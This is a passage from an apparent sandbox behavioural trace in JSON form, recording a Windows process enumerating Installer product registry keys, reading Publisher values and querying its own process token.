"id": 252 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 253 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "9" }, { "name": "Name", "value": "EAEFC47574231664CA1BD3EFB96C36EF" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" } ], "repeated": 0, "id": 254 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 255 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 256 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 257 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 258 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 259 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 260 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\x7f\\x00\\x01\\x00" } ], "repeated": 0, "id": 261 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 262 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" } ], "repeated": 0, "id": 263 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 264 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 265 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 266 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" } ], "repeated": 0, "id": 267 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 268 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 269 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 270 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 271 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties" } ], "repeated": 0, "id": 272 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 273 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 274 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 275 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 276 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 277 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 278 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "10" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\" } ], "repeated": 0, "id": 279 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 280 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 281 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 282 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 283 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 284 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 285 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 286 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 287 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\xfb\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 288 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 289 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x0000023c" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 290 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000023c" }, { "name": "SubKey", "value": "2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 291 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 292 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 293 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 294 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\x7f\\x00\\x01\\x00" } ], "repeated": 0, "id": 295 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 296 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 297 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 298 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 299 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 300 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 301 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 302 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 303 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties" } ], "repeated": 0, "id": 304 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Data", "value": "Microsoft Corporation" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 305 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 306 }, { "timestamp": "2025-02-27 23:34:21,581", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": 